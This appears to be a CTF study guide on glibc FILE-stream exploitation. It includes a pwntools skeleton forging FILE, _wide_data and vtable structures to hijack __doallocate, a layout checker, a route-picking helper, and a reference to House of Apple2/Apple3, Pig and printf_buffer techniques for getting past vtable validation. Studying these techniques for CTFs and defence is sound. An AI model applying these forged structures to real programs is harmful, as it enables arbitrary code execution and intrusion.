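# Checks differ between glibc versions; these offsets follow the usual x86_64 layout on recent glibc
# (set libc.address from a leak before using libc.sym)
file_struct = fit({
    0x88: p64(fake_lock),                  # _lock: point it at writable memory
    0xa0: p64(fake_wide),                  # _wide_data
    0xc0: p32(1),                          # _mode > 0
    0xd8: p64(libc.sym['_IO_wfile_jumps']) # legitimate main vtable
}, filler=b'\x00')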

wide_data = fit({
    0x18: p64(0),                         # _IO_write_base = NULL
    0x20: p64(1),                         # _IO_write_ptr > _IO_write_base
    0xe0: p64(fake_wide_vtable),          # _wide_vtable
}, filler=b'\x00')

wide_vtable = fit({
    0x68: p64(target),                    # __doallocate
}, filler=b'\x00')

# write(fake_file, file_struct)
# write(fake_wide, wide_data)
# write(fake_wide_vtable, wide_vtable)
# then repoint the stderr/stdout pointer at fake_file, or overwrite an existing FILE object in place
# finally trigger exit() / a normal return

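A few easy pitfalls worth noting separately:

The main vtable now goes through IO_validate_vtable, so "fake FILE + fake main vtable" usually dies immediately on recent glibc
The essence of the wide-character route is "main table legitimate, side chain forged"; don't mix the two up
__doallocate(fp) receives fp as its argument, so the landing point need not be system; often win, setcontext, or a call sink that suits your current register state is more reliable
For this chain, _lock, _mode, _wide_data, and the write-pointer relation all have to be mutually consistent, or you crash before reaching the hijack point
Offsets depend heavily on the glibc version; for a real target, confirm locally with pahole / readelf / the source rather than memorizing fixed numbers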
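Since most failures come from fields that are not mutually consistent, a small offline checker over the raw bytes can save debugging time. The sketch below is plain Python; it hard-codes the x86_64 offsets listed earlier plus `wide_data + 0x30` for `_IO_buf_base` (my assumption from the struct layout), and `check_wide_chain` is a hypothetical helper.

```python
import struct

# x86_64 offsets; confirm per glibc version.
OFF_LOCK, OFF_WIDE_DATA, OFF_MODE, OFF_VTABLE = 0x88, 0xA0, 0xC0, 0xD8
W_WRITE_BASE, W_WRITE_PTR, W_BUF_BASE, W_VTABLE = 0x18, 0x20, 0x30, 0xE0

def q(buf, off):
    """Read a little-endian qword at `off`."""
    return struct.unpack_from('<Q', buf, off)[0]

def check_wide_chain(file_blob, wide_blob, wfile_jumps):
    """Return a list of inconsistencies in a fake FILE / fake _wide_data pair."""
    problems = []
    if q(file_blob, OFF_LOCK) == 0:
        problems.append('_lock is NULL')
    if q(file_blob, OFF_WIDE_DATA) == 0:
        problems.append('_wide_data is NULL')
    if struct.unpack_from('<i', file_blob, OFF_MODE)[0] <= 0:
        problems.append('_mode must be > 0 for the wide branch')
    if q(file_blob, OFF_VTABLE) != wfile_jumps:
        problems.append('main vtable is not _IO_wfile_jumps')
    if q(wide_blob, W_WRITE_PTR) <= q(wide_blob, W_WRITE_BASE):
        problems.append('wide write_ptr must be > write_base')
    if q(wide_blob, W_WRITE_BASE) != 0:
        problems.append('wide write_base must be NULL')
    if q(wide_blob, W_BUF_BASE) != 0:
        problems.append('wide buf_base must be NULL')
    if q(wide_blob, W_VTABLE) == 0:
        problems.append('_wide_vtable is NULL')
    return problems

# Made-up addresses, mirroring the skeleton's field values.
WFILE_JUMPS = 0x7F0000202228
file_blob = bytearray(0xE0)
struct.pack_into('<Q', file_blob, OFF_LOCK, 0x404D00)
struct.pack_into('<Q', file_blob, OFF_WIDE_DATA, 0x404B00)
struct.pack_into('<i', file_blob, OFF_MODE, 1)
struct.pack_into('<Q', file_blob, OFF_VTABLE, WFILE_JUMPS)
wide_blob = bytearray(0xE8)
struct.pack_into('<Q', wide_blob, W_WRITE_PTR, 1)
struct.pack_into('<Q', wide_blob, W_VTABLE, 0x404C00)

result = check_wide_chain(file_blob, wide_blob, WFILE_JUMPS)
print(result or 'layout looks self-consistent')
```

The same function accepts the bytes produced by the pwntools `fit()` calls in the skeleton, as long as the blobs are padded to at least 0xe0 and 0xe8 bytes.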

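When actually solving, don't rush to recall house names; work through these questions in order:

Can you directly modify the contents of the existing stdout/stderr?
- Yes: leak first; turn stdout/stderr into an outlet for libc / stack addresses
Can you point a global FILE pointer or _IO_list_all at a fake FILE on the heap?
- Yes: think of an exit() trigger first, then decide between the wfile, str, obstack, and printf_buffer routes
Does the local libc have _IO_obstack_jumps?
- Yes: the older obstack route may still be alive
- No, but __printf_buffer_as_file_jumps exists: this looks like the newer bridge route on glibc 2.37+
Is your fake FILE easier to forge as a write stream or a read stream?
- Write stream: prefer Apple2, Pig, obstack, printf_buffer
- Read stream: prefer Apple3-style routes that use _codecvt/__gconv_step to set up registers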
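The checklist above is mechanical enough to write down as a function. This is just the same heuristics in code form, not an oracle; `suggest_fsop_route` and its parameters are made up for illustration, and `libc_symbols` is assumed to be any collection of symbol names from the target libc.

```python
def suggest_fsop_route(can_edit_std_streams, can_redirect_file_ptr,
                       libc_symbols, stream_kind):
    """Walk the checklist in order and return the resulting hints.

    stream_kind: 'write' or 'read', whichever the fake FILE is easier to forge as.
    """
    hints = []
    if can_edit_std_streams:
        hints.append('leak via stdout/stderr first')
    if can_redirect_file_ptr:
        hints.append('plan an exit() trigger')
    if '_IO_obstack_jumps' in libc_symbols:
        hints.append('older obstack route may still work')
    elif '__printf_buffer_as_file_jumps' in libc_symbols:
        hints.append('printf_buffer bridge (glibc 2.37+ style)')
    if stream_kind == 'write':
        hints.append('candidates: Apple2, Pig, obstack, printf_buffer')
    elif stream_kind == 'read':
        hints.append('candidates: Apple3 via _codecvt/__gconv_step')
    return hints

hints = suggest_fsop_route(
    can_edit_std_streams=False,
    can_redirect_file_ptr=True,
    libc_symbols={'_IO_wfile_jumps', '__printf_buffer_as_file_jumps'},
    stream_kind='write',
)
print('\n'.join(hints))
```

With pwntools, the keys of `ELF('./libc.so.6').symbols` should work as `libc_symbols`, provided the libc still carries those symbols in its symbol table.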

Confirm the version and entry points locally first; these commands are worth keeping handy:

readelf -Ws ./libc.so.6 | rg '_IO_wfile_jumps|_IO_obstack_jumps|__printf_buffer_as_file_jumps|_IO_str_jumps'
strings ./libc.so.6 | rg 'GLIBC_2\.(3[4-9]|4[0-9])'
gdb -q ./pwn
pwndbg> p &_IO_2_1_stdout_
pwndbg> p &_IO_2_1_stderr_
pwndbg> p &_IO_wfile_jumps
pwndbg> p &__printf_buffer_as_file_jumps

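Compressed into a quick reference by technique name:

stdout/stderr: leak first, usually followed by environ -> stack
_IO_wfile_jumps + _wide_vtable: the stable control-flow entry most worth considering first on modern glibc
House of Apple2: keep the legitimate _IO_wfile_jumps as the main table, overlap fp/_wide_data/_wide_vtable in one region, and take off through __doallocate(fp); many challenges pair it with largebin attack -> _IO_list_all
House of Apple3: essentially a misaligned vtable such as &_IO_wfile_jumps + 0x08, then _codecvt -> __gconv_step -> __fct to set up a setcontext-style register layout; well suited to launching a large ROP chain directly from the heap
House of Pig: the point is not the name but remembering that _IO_str_overflow computes a precise malloc(new_size) from your forged write_ptr/buf_base/buf_end; older challenges chain into hooks, and modern ones can steer that allocation to another target
_IO_obstack_jumps / House of Lys: on older glibc you can still take the very direct call chain obstack_grow -> _obstack_newchunk -> CALL_CHUNKFUN
__printf_buffer_as_file_jumps: the newer route to look at first on glibc 2.37+; the outer layer is a legitimate FILE, the second layer is __printf_buffer, the third falls back to obstack, and it still ends at CALL_CHUNKFUN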

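Translated into challenge terms, roughly:

You can only modify stdout/stderr themselves: leak first, don't force control flow yet
You can point _IO_list_all at a heap chunk: look at exit() first, then at whether your fake FILE's fields look more like a write stream or a read stream
libc still has _IO_obstack_jumps: keep the obstack route in mind
libc lacks _IO_obstack_jumps but has __printf_buffer_as_file_jumps: you most likely have to go through the printf_buffer layer to get back to obstack
You see _codecvt, __gconv_step, or setcontext: think of Apple3 first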
